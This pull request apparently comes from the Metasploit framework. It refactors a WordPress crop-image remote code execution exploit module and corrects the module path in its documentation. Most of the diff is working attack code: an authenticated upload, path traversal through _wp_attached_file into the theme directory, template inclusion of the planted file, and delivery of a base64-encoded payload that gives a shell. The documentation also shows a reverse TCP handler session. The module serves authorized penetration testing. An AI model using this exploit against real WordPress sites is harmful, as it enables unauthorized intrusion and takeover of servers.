### PR TITLE
Add checks to scan function and fix some spacing

### DIFF
--- a/documentation/modules/exploit/multi/http/wp_crop_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_crop_rce.md
@@ -16,7 +16,7 @@ More details can be found on [RIPS Technology Blog](https://blog.ripstech.com/20
 
 Confirm that functionality works:
 1. Start `msfconsole`
-2. `use exploit/unix/webapp/wp_crop_rce`
+2. `use exploit/multi/http/wp_crop_rce`
 3. Set the `RHOST`
 4. Set `USERNAME` and `PASSWORD`
 4. Set `LHOST` and `LPORT`
@@ -29,14 +29,14 @@ Confirm that functionality works:
 ### Ubuntu 18.04 running WordPress 4.9.8
 
 ```
-msf5 > use exploit/unix/webapp/wp_crop_rce
-msf5 exploit(unix/webapp/wp_crop_rce) > set rhosts 127.0.0.1
+msf5 > use exploit/multi/http/wp_crop_rce
+msf5 exploit(multi/http/wp_crop_rce) > set rhosts 127.0.0.1
 rhosts => 127.0.0.1
-msf5 exploit(unix/webapp/wp_crop_rce) > set username author
+msf5 exploit(multi/http/wp_crop_rce) > set username author
 username => author
-msf5 exploit(unix/webapp/wp_crop_rce) > set password author
+msf5 exploit(multi/http/wp_crop_rce) > set password author
 password => author
-msf5 exploit(unix/webapp/wp_crop_rce) > run
+msf5 exploit(multi/http/wp_crop_rce) > run
 
 [*] Started reverse TCP handler on 127.0.0.1:4444 
 [*] Authenticating with WordPress using author:author...

--- a/modules/exploits/multi/http/wp_crop_rce.rb
+++ b/modules/exploits/multi/http/wp_crop_rce.rb
@@ -101,9 +101,12 @@ class MetasploitModule < Msf::Exploit::Remote
       'method'    => 'GET',
       'uri'       => uri
     )
-    if res && res.code == 200 && res.body && res.body.length > 0
-      res.body.scan(/\/wp-content\/themes\/(\w+)\//).flatten.first
-    end
+    fail_with(Failure::NotFound, 'Failed to access Wordpress page to retrieve theme.') unless res && res.code == 200 && res.body && res.body.length > 0
+
+    theme = res.body.scan(/\/wp-content\/themes\/(\w+)\//).flatten.first
+    fail_with(Failure::NotFound, 'Failed to retrieve theme') unless theme
+
+    theme
   end
 
   def get_ajaxnonce(cookie)
@@ -122,9 +125,11 @@ class MetasploitModule < Msf::Exploit::Remote
         'query[paged]' => '1'
       }
     )
-    if res && res.code == 200 && res.body && res.body.length > 0
-      res.body.scan(/"edit":"(\w+)"/).flatten.first
-    end
+    fail_with(Failure::NotFound, 'Unable to reach page to retrieve the ajax nonce') unless res && res.code == 200 && res.body && res.body.length > 0
+    a_nonce = res.body.scan(/"edit":"(\w+)"/).flatten.first
+    fail_with(Failure::NotFound, 'Unable to retrieve the ajax nonce') unless a_nonce
+
+    a_nonce
   end
 
   def upload_file(tmp_filename, img_name, wp_nonce, cookie)
@@ -183,10 +188,11 @@ class MetasploitModule < Msf::Exploit::Remote
         'do' => 'save'
       }
     )
-    if res && res.code == 200 && res.body && res.body.length > 0
-      filename = res.body.scan(/(#{img_name}-\S+)-/).flatten.first
-      filename += '.jpg'
-    end
+    fail_with(Failure::NotFound, 'Unable to access page to retrieve filename') unless res && res.code == 200 && res.body && res.body.length > 0
+    filename = res.body.scan(/(#{img_name}-\S+)-/).flatten.first
+    fail_with(Failure::NotFound, 'Unable to retrieve file name') unless filename
+
+    filename << '.jpg'
   end
 
   def change_path(wpnonce2, image_id, filename, current_date, path, cookie)
@@ -234,6 +240,8 @@ class MetasploitModule < Msf::Exploit::Remote
     if res && res.code == 200 && res.body && res.body.length > 0
       wpnonce2 = res.body.scan(/name="_wpnonce" value="(\w+)"/).flatten.first
       post_id = res.body.scan(/"post":{"id":(\w+),/).flatten.first
+      fail_with(Failure::NotFound, 'Unable to retrieve the second wpnonce and the post id') unless wpnonce2 && post_id
+
       post_title = Rex::Text.rand_text_alpha(10)
       uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
       res = send_request_cgi(
@@ -289,9 +297,12 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri'       => uri1,
       'cookie'    => cookie
     )
+
     if res && res.code == 200 && res.body && res.body.length > 0
       post_nonce = res.body.scan(/post=#{post_id}&amp;action=trash&amp;_wpnonce=(\w+)/).flatten.first
+      fail_with(Failure::NotFound, 'Unable to retrieve post nonce') unless post_nonce
       uri2 = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
+
       res = send_request_cgi(
         'method'    => 'GET',
         'uri'       => uri2,
@@ -302,6 +313,7 @@ class MetasploitModule < Msf::Exploit::Remote
           '_wpnonce' => "#{post_nonce}"
         }
       )
+
       if res && res.code == 302
         res = send_request_cgi(
           'method'    => 'GET',
@@ -313,8 +325,11 @@ class MetasploitModule < Msf::Exploit::Remote
             '_wpnonce' => "#{post_nonce}"
           }
         )
+
         if res && res.code == 200 && res.body && res.body.length > 0
           nonce = res.body.scan(/post=#{post_id}&amp;action=delete&amp;_wpnonce=(\w+)/).flatten.first
+          fail_with(Failure::NotFound, 'Unable to retrieve nonce') unless nonce
+
           res = send_request_cgi(
             'method'    => 'GET',
             'uri'       => uri2,

--- a/modules/exploits/multi/http/wp_crop_rce.rb
+++ b/modules/exploits/multi/http/wp_crop_rce.rb
@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'rex'
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
@@ -16,10 +14,10 @@ class MetasploitModule < Msf::Exploit::Remote
     info,
     'Name'            => 'WordPress Crop-image Shell Upload',
     'Description'     => %q{
-        This module exploit a path traversal and a local file inclusion
-        vulnerability on WordPress versions 4.9.8 and less.
-        The crop-image function allow an user, with at least author privileges,
-        to resize an image an perform a path traversal by changing the _wp_attached_file
+        This module exploits a path traversal and a local file inclusion
+        vulnerability on WordPress versions 5.0.0 and <= 4.9.8.
+        The crop-image function allows a user, with at least author privileges,
+        to resize an image and perform a path traversal by changing the _wp_attached_file
         reference during the upload. The second part of the exploit will include
         this image in the current theme by changing the _wp_page_template attribute
         when creating a post.
@@ -45,8 +43,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   register_options(
     [
-    OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),
-    OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with'])
+      OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),
+      OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with'])
     ])
   end
 
@@ -61,11 +59,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def username
-  datastore['USERNAME']
+    datastore['USERNAME']
   end
 
   def password
-  datastore['PASSWORD']
+    datastore['PASSWORD']
   end
 
   def get_wpnonce(cookie)
@@ -87,9 +85,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri'       => uri,
       'cookie'    => cookie,
       'vars_get'  => {
-          'post'   => "#{image_id}",
-          'action' => "edit"
-        }
+        'post'   => "#{image_id}",
+        'action' => "edit"
+      }
     )
     if res && res.code == 200 && res.body && res.body.length > 0
       tmp = res.get_hidden_inputs
@@ -115,14 +113,14 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri'       => uri,
       'cookie' => cookie,
       'vars_post'  => {
-      'action' => 'query-attachments',
-      'post_id' => '0',
-      'query[item]' => '43',
-      'query[orderby]' => 'date',
-      'query[order]' => 'DESC',
-      'query[posts_per_page]' => '40',
-      'query[paged]' => '1'
-          }
+        'action' => 'query-attachments',
+        'post_id' => '0',
+        'query[item]' => '43',
+        'query[orderby]' => 'date',
+        'query[order]' => 'DESC',
+        'query[posts_per_page]' => '40',
+        'query[paged]' => '1'
+      }
     )
     if res && res.code == 200 && res.body && res.body.length > 0
       res.body.scan(/"edit":"(\w+)"/).flatten.first
@@ -135,7 +133,7 @@ class MetasploitModule < Msf::Exploit::Remote
     img_name += '.jpg'
 
     boundary = "#{rand_text_alphanumeric(rand(10) + 5)}"
-    post_data  = "--#{boundary}\r\n"
+    post_data = "--#{boundary}\r\n"
     post_data << "Content-Disposition: form-data; name=\"name\"\r\n"
     post_data << "\r\n#{img_name}\r\n"
     post_data << "--#{boundary}\r\n"
@@ -152,21 +150,21 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Uploading payload")
     upload_uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'async-upload.php')
 
-      res = send_request_cgi(
-        'method'   => 'POST',
-        'uri'      => upload_uri,
-        'ctype'    => "multipart/form-data; boundary=#{boundary}",
-        'data'     => post_data,
-        'cookie'   => cookie
-      )
-      if res && res.code == 200 && res.body && res.body.length > 0
-        print_good("Image uploaded")
-        res = JSON.parse(res.body)
-        image_id = res["data"]["id"]
-        update_nonce = res["data"]["nonces"]["update"]
-        filename = res["data"]["filename"]
-        return filename, image_id, update_nonce
-      end
+    res = send_request_cgi(
+      'method'   => 'POST',
+      'uri'      => upload_uri,
+      'ctype'    => "multipart/form-data; boundary=#{boundary}",
+      'data'     => post_data,
+      'cookie'   => cookie
+    )
+    if res && res.code == 200 && res.body && res.body.length > 0
+      print_good("Image uploaded")
+      res = JSON.parse(res.body)
+      image_id = res["data"]["id"]
+      update_nonce = res["data"]["nonces"]["update"]
+      filename = res["data"]["filename"]
+      return filename, image_id, update_nonce
+    end
   end
 
   def image_editor(img_name, ajax_nonce, image_id, cookie)
@@ -176,14 +174,14 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri'       => uri,
       'cookie' => cookie,
       'vars_post'  => {
-      'action' => 'image-editor',
-      '_ajax_nonce' => ajax_nonce,
-      'postid' => image_id,
-      'history' => '[{"c":{"x":0,"y":0,"w":400,"h":300}}]',
-      'target' => 'all',
-      'context' => '',
-      'do' => 'save'
-          }
+        'action' => 'image-editor',
+        '_ajax_nonce' => ajax_nonce,
+        'postid' => image_id,
+        'history' => '[{"c":{"x":0,"y":0,"w":400,"h":300}}]',
+        'target' => 'all',
+        'context' => '',
+        'do' => 'save'
+      }
     )
     if res && res.code == 200 && res.body && res.body.length > 0
       filename = res.body.scan(/(#{img_name}-\S+)-/).flatten.first
@@ -194,44 +192,44 @@ class MetasploitModule < Msf::Exploit::Remote
   def change_path(wpnonce2, image_id, filename, current_date, path, cookie)
     uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
     res = send_request_cgi(
-        'method'   => 'POST',
-        'uri'      => uri,
-        'cookie' => cookie,
-        'vars_post'  => {
+      'method'   => 'POST',
+      'uri'      => uri,
+      'cookie' => cookie,
+      'vars_post'  => {
         '_wpnonce' => wpnonce2,
-      'action' => 'editpost',
-      'post_ID' => image_id,
-      'meta_input[_wp_attached_file]' => "#{current_date}#{filename}#{path}"
-          }
-      )
+        'action' => 'editpost',
+        'post_ID' => image_id,
+        'meta_input[_wp_attached_file]' => "#{current_date}#{filename}#{path}"
+      }
+    )
   end
 
-  def crop_image(image_id , ajax_nonce, cookie)
+  def crop_image(image_id, ajax_nonce, cookie)
     uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
     res = send_request_cgi(
-        'method'   => 'POST',
-        'uri'      => uri,
-        'cookie' => cookie,
-        'vars_post'  => {
-      'action' => 'crop-image',
-      '_ajax_nonce' => ajax_nonce,
-      'id' => image_id,
-      'cropDetails[x1]' => 0,
-      'cropDetails[y1]' => 0,
-      'cropDetails[width]' => 400,
-      'cropDetails[height]' => 300,
-      'cropDetails[dst_width]' => 400,
-      'cropDetails[dst_height]' => 300
-        }
+      'method'   => 'POST',
+      'uri'      => uri,
+      'cookie' => cookie,
+      'vars_post'  => {
+        'action' => 'crop-image',
+        '_ajax_nonce' => ajax_nonce,
+        'id' => image_id,
+        'cropDetails[x1]' => 0,
+        'cropDetails[y1]' => 0,
+        'cropDetails[width]' => 400,
+        'cropDetails[height]' => 300,
+        'cropDetails[dst_width]' => 400,
+        'cropDetails[dst_height]' => 300
+      }
     )
   end
 
   def include_theme(shell_name, cookie)
     uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post-new.php')
     res = send_request_cgi(
-        'method'   => 'POST',
-        'uri'      => uri,
-        'cookie' => cookie
+      'method'   => 'POST',
+      'uri'      => uri,
+      'cookie' => cookie
     )
     if res && res.code == 200 && res.body && res.body.length > 0
       wpnonce2 = res.body.scan(/name="_wpnonce" value="(\w+)"/).flatten.first
@@ -249,7 +247,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'post_title' => post_title,
           'post_name' => post_title,
           'meta_input[_wp_page_template]' => "cropped-#{shell_name}.jpg"
-          }
+        }
       )
       if res && res.code == 302
         post_id
@@ -265,7 +263,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'cookie'    => cookie,
       'vars_post'  => {
           'action' => "query-attachments"
-        }
+      }
     )
     if res && res.code == 200 && res.body && res.body.length > 0
       infos = res.body.scan(/id":(\d+),.*filename":"cropped-#{shell_name}".*?"delete":"(\w+)".*"id":(\d+),.*filename":"cropped-x".*?"delete":"(\w+)".*"id":(\d+),.*filename":"#{shell_name}".*?"delete":"(\w+)"/).flatten
@@ -273,13 +271,13 @@ class MetasploitModule < Msf::Exploit::Remote
       delete_nonce1, delete_nonce2, delete_nonce3 = infos[1], infos[3], infos[5]
       for i in (0...6).step(2)
         res = send_request_cgi(
-        'method'    => 'POST',
-        'uri'       => uri,
-        'cookie'    => cookie,
-        'vars_post'  => {
-            'action' => "delete-post",
-            'id'     => "#{infos[i]}",
-            '_wpnonce' => "#{infos[i+1]}"
+          'method'    => 'POST',
+          'uri'       => uri,
+          'cookie'    => cookie,
+          'vars_post'  => {
+              'action' => "delete-post",
+              'id'     => "#{infos[i]}",
+              '_wpnonce' => "#{infos[i+1]}"
           }
         )
       end
@@ -306,25 +304,25 @@ class MetasploitModule < Msf::Exploit::Remote
       )
       if res && res.code == 302
         res = send_request_cgi(
-        'method'    => 'GET',
-        'uri'       => uri1,
-        'cookie'    => cookie,
-        'vars_get'  => {
-          'post_status' => "trash",
-          'post_type'   => 'post',
-          '_wpnonce' => "#{post_nonce}"
+          'method'    => 'GET',
+          'uri'       => uri1,
+          'cookie'    => cookie,
+          'vars_get'  => {
+            'post_status' => "trash",
+            'post_type'   => 'post',
+            '_wpnonce' => "#{post_nonce}"
           }
         )
         if res && res.code == 200 && res.body && res.body.length > 0
           nonce = res.body.scan(/post=#{post_id}&amp;action=delete&amp;_wpnonce=(\w+)/).flatten.first
           res = send_request_cgi(
-          'method'    => 'GET',
-          'uri'       => uri2,
-          'cookie'    => cookie,
-          'vars_get'  => {
-            'post'     => "#{post_id}",
-            'action'   => 'delete',
-            '_wpnonce' => "#{nonce}"
+            'method'    => 'GET',
+            'uri'       => uri2,
+            'cookie'    => cookie,
+            'vars_get'  => {
+              'post'     => "#{post_id}",
+              'action'   => 'delete',
+              '_wpnonce' => "#{nonce}"
             }
           )
         end
@@ -352,19 +350,19 @@ class MetasploitModule < Msf::Exploit::Remote
     ajax_nonce = get_ajaxnonce(cookie)
 
     @filename1 = image_editor(img_name, ajax_nonce, image_id, cookie)
-    wpnonce2 =  get_wpnonce2(image_id, cookie)
+    wpnonce2 = get_wpnonce2(image_id, cookie)
 
     change_path(wpnonce2, image_id, @filename1, @current_date, '?/x', cookie)
-    crop_image(image_id , ajax_nonce, cookie)
+    crop_image(image_id, ajax_nonce, cookie)
 
     @shell_name = Rex::Text.rand_text_alpha(10)
     change_path(wpnonce2, image_id, @filename1, @current_date, "?/../../../../themes/#{@current_theme}/#{@shell_name}", cookie)
-    crop_image(image_id , ajax_nonce, cookie)
+    crop_image(image_id, ajax_nonce, cookie)
 
     print_status("Including into theme")
     post_id = include_theme(@shell_name, cookie)
     uri = normalize_uri(datastore['TARGETURI'])
-    #Test if base64 is on target
+    # Test if base64 is on target
     test_string = 'YmFzZTY0c3BvdHRlZAo='
     res = send_request_cgi(
       'method'   => 'GET',
@@ -377,7 +375,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     if res && res.code == 200 && res.body && res.body.length > 0
       if res.body.include?("base64spotted")
-        #Execute payload with base64 decode
+        # Execute payload with base64 decode
         @backdoor = Rex::Text.rand_text_alpha(10)
         encoded = Rex::Text.encode_base64(payload.encoded)
         res = send_request_cgi(
@@ -395,7 +393,7 @@ class MetasploitModule < Msf::Exploit::Remote
             'method'   => 'GET',
             'uri'      => uri,
             'cookie' => cookie
-            )
+          )
         end
       else
         print_status("Can't find base64 decode on target.")
@@ -411,5 +409,4 @@ class MetasploitModule < Msf::Exploit::Remote
     client.shell_command_token("rm wp-content/themes/#{@current_theme}/cropped-#{@shell_name}.jpg")
     client.shell_command_token("rm #{@backdoor}.php")
   end
-
 end

--- a/modules/exploits/multi/http/wp_crop_rce.rb
+++ b/modules/exploits/multi/http/wp_crop_rce.rb
@@ -49,13 +49,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-  cookie = wordpress_login(username, password)
-  if cookie.nil?
-    store_valid_credential(user: username, private: password, proof: cookie)
-    return CheckCode::Safe
-  end
+    cookie = wordpress_login(username, password)
+    if cookie.nil?
+      store_valid_credential(user: username, private: password, proof: cookie)
+      return CheckCode::Safe
+    end
 
-  CheckCode::Appears
+    CheckCode::Appears
   end
 
   def username


### PR DESCRIPTION
I added some checks to some of the calls to `scan` in case those calls return `nil`. There was also some spacing/indentation changes made.

## Verification

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/wp_crop_rce`
- [ ]  `set RHOSTS <IP>`
- [ ]  `set USERNAME <NAME>`
- [ ]  `set PASSWORD <PASS>`
- [ ]  `run`
- [ ]  Get a shell